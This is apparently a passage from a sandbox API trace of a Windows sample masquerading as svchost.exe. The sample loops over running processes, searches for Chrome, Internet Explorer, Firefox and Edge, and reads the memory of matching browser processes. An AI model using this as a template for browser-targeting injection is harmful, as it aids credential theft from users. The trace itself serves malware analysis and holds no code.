	[0252.992] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact-film-anticipated.exe")) returned 1
	[0252.993] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb40) returned 0xa7e0
	[0252.993] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.993] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="chrome.exe") returned 0x0
	[0252.994] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.994] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="iexplore.exe") returned 0x0
	[0252.995] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.995] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="firefox.exe") returned 0x0
	[0252.995] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.995] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0252.996] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wanting villages.exe")) returned 1
	[0252.996] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb50) returned 0xa7e4
	[0252.996] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.997] StrStrIA (lpFirst="wanting villages.exe", lpSrch="chrome.exe") returned 0x0
	[0252.997] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.997] StrStrIA (lpFirst="wanting villages.exe", lpSrch="iexplore.exe") returned 0x0
	[0252.997] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.997] StrStrIA (lpFirst="wanting villages.exe", lpSrch="firefox.exe") returned 0x0
	[0252.998] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.998] StrStrIA (lpFirst="wanting villages.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0252.998] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="engagementresearchersmonkey.exe")) returned 1
	[0252.999] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb60) returned 0xa7e8
	[0252.999] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.999] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="chrome.exe") returned 0x0
	[0253.000] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.000] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="iexplore.exe") returned 0x0
	[0253.000] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.000] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="firefox.exe") returned 0x0
	[0253.001] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.001] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0253.002] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="surgical-marcus.exe")) returned 1
	[0253.002] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb70) returned 0xa7ec
	[0253.003] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.003] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="chrome.exe") returned 0x0
	[0253.003] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.003] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="iexplore.exe") returned 0x0
	[0253.004] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.004] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="firefox.exe") returned 0x0
	[0253.004] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.004] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0253.004] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0253.005] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc38) returned 0xa7f0
	[0253.005] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.005] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0253.006] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.006] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0253.006] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.006] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0253.006] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.006] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0253.006] NtQueryInformationProcess (in: ProcessHandle=0xa7f0, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0253.007] ReadProcessMemory (in: hProcess=0xa7f0, lpBaseAddress=0x7ffdb000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0253.007] ReadProcessMemory (in: hProcess=0xa7f0, lpBaseAddress=0x2b11c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0253.007] ReadProcessMemory (in: hProcess=0xa7f0, lpBaseAddress=0x2b1998, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0253.007] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0253.007] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xc38, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0253.008] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc94) returned 0xa7f4
	[0253.008] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.008] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0253.008] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.008] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0253.008] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.008] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0253.009] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.009] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0253.009] NtQueryInformationProcess (in: ProcessHandle=0xa7f4, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0253.009] ReadProcessMemory (in: hProcess=0xa7f4, lpBaseAddress=0x7ffde000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0253.009] ReadProcessMemory (in: hProcess=0xa7f4, lpBaseAddress=0x911c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0253.009] ReadProcessMemory (in: hProcess=0xa7f4, lpBaseAddress=0x919ba, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0253.009] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0253.010] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x34c, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0253.010] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x914) returned 0xa7f8
	[0253.010] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.010] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0253.011] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.011] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0253.011] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.012] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0253.012] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.012] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0253.012] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x914, pcPriClassBase=6, dwFlags=0x0, szExeFile="tadiapce.exe")) returned 1
	[0253.013] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x214) returned 0xa7fc
	[0253.013] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.013] StrStrIA (lpFirst="tadiapce.exe", lpSrch="chrome.exe") returned 0x0
	[0253.013] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.013] StrStrIA (lpFirst="tadiapce.exe", lpSrch="iexplore.exe") returned 0x0
	[0253.014] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.014] StrStrIA (lpFirst="tadiapce.exe", lpSrch="firefox.exe") returned 0x0
	[0253.014] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.014] StrStrIA (lpFirst="tadiapce.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0253.014] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0253.015] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaa8) returned 0xa804
	[0253.015] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.015] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0253.015] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.015] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0253.016] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.016] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0253.016] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.016] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0253.016] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0253.017] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0253.018] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x6d8) returned 0xa808
	[0253.018] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.019] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0253.019] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.019] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0253.019] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.020] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0253.020] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.020] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0253.020] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0253.021] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa70) returned 0xa80c
	[0253.021] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.021] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0253.022] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.022] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0253.022] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.022] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0253.022] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.022] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0253.022] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0253.023] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc20) returned 0xa810
	[0253.023] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.023] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0253.024] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.024] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0253.024] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.024] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0253.024] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.024] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0253.025] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0253.025] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb28) returned 0xa814
	[0253.025] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.025] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0253.026] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.026] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0253.026] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.026] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0253.026] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.026] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0253.027] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xda0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0253.027] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xda0) returned 0xa818
	[0253.027] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.028] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0253.028] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.028] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0253.028] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.028] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0253.028] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.029] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0253.029] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xa70, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1
	[0253.029] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xbb4) returned 0xa81c
	[0253.030] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.030] StrStrIA (lpFirst="cmd.exe", lpSrch="chrome.exe") returned 0x0
	[0253.030] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.030] StrStrIA (lpFirst="cmd.exe", lpSrch="iexplore.exe") returned 0x0
	[0253.030] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.030] StrStrIA (lpFirst="cmd.exe", lpSrch="firefox.exe") returned 0x0
	[0253.030] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.030] StrStrIA (lpFirst="cmd.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0253.031] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1
	[0253.031] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xbc0) returned 0xa820
	[0253.031] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.031] StrStrIA (lpFirst="conhost.exe", lpSrch="chrome.exe") returned 0x0
	[0253.032] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.032] StrStrIA (lpFirst="conhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0253.032] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.032] StrStrIA (lpFirst="conhost.exe", lpSrch="firefox.exe") returned 0x0
	[0253.032] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.033] StrStrIA (lpFirst="conhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0253.033] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x950, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xbb4, pcPriClassBase=8, dwFlags=0x0, szExeFile="net.exe")) returned 1
	[0253.034] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x950) returned 0xa824
	[0253.034] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.034] StrStrIA (lpFirst="net.exe", lpSrch="chrome.exe") returned 0x0
	[0253.035] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.035] StrStrIA (lpFirst="net.exe", lpSrch="iexplore.exe") returned 0x0
	[0253.035] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.035] StrStrIA (lpFirst="net.exe", lpSrch="firefox.exe") returned 0x0
	[0253.035] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.035] StrStrIA (lpFirst="net.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0253.035] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x748, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0253.036] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x748) returned 0xa828
	[0253.036] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.036] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0253.036] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.037] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0253.037] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.037] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0253.037] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.037] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0253.037] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xd70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xa70, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1
	[0253.038] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xd70) returned 0xa82c
	[0253.038] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.038] StrStrIA (lpFirst="cmd.exe", lpSrch="chrome.exe") returned 0x0
	[0253.039] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.039] StrStrIA (lpFirst="cmd.exe", lpSrch="iexplore.exe") returned 0x0
	[0253.039] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.039] StrStrIA (lpFirst="cmd.exe", lpSrch="firefox.exe") returned 0x0
	[0253.039] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.039] StrStrIA (lpFirst="cmd.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0253.039] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xd6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1
	[0253.040] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xd6c) returned 0xa830
	[0253.040] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.041] StrStrIA (lpFirst="conhost.exe", lpSrch="chrome.exe") returned 0x0
	[0253.041] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.041] StrStrIA (lpFirst="conhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0253.041] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.041] StrStrIA (lpFirst="conhost.exe", lpSrch="firefox.exe") returned 0x0
	[0253.041] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.042] StrStrIA (lpFirst="conhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0253.042] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xed4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xd70, pcPriClassBase=8, dwFlags=0x0, szExeFile="net.exe")) returned 1
	[0253.042] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xed4) returned 0xa834
	[0253.043] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.043] StrStrIA (lpFirst="net.exe", lpSrch="chrome.exe") returned 0x0
	[0253.043] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.043] StrStrIA (lpFirst="net.exe", lpSrch="iexplore.exe") returned 0x0
	[0253.043] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.043] StrStrIA (lpFirst="net.exe", lpSrch="firefox.exe") returned 0x0
	[0253.043] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.043] StrStrIA (lpFirst="net.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0253.044] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xed4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xd70, pcPriClassBase=8, dwFlags=0x0, szExeFile="net.exe")) returned 0
	[0253.044] CloseHandle (hObject=0x4fd0) returned 1
	[0253.044] Sleep (dwMilliseconds=0x64) 
	[0253.157] GetCurrentProcessId () returned 0x110
	[0253.157] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x4fd0
	[0253.160] Process32First (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0253.160] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0253.161] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0253.162] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x104) returned 0xa838
	[0253.162] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
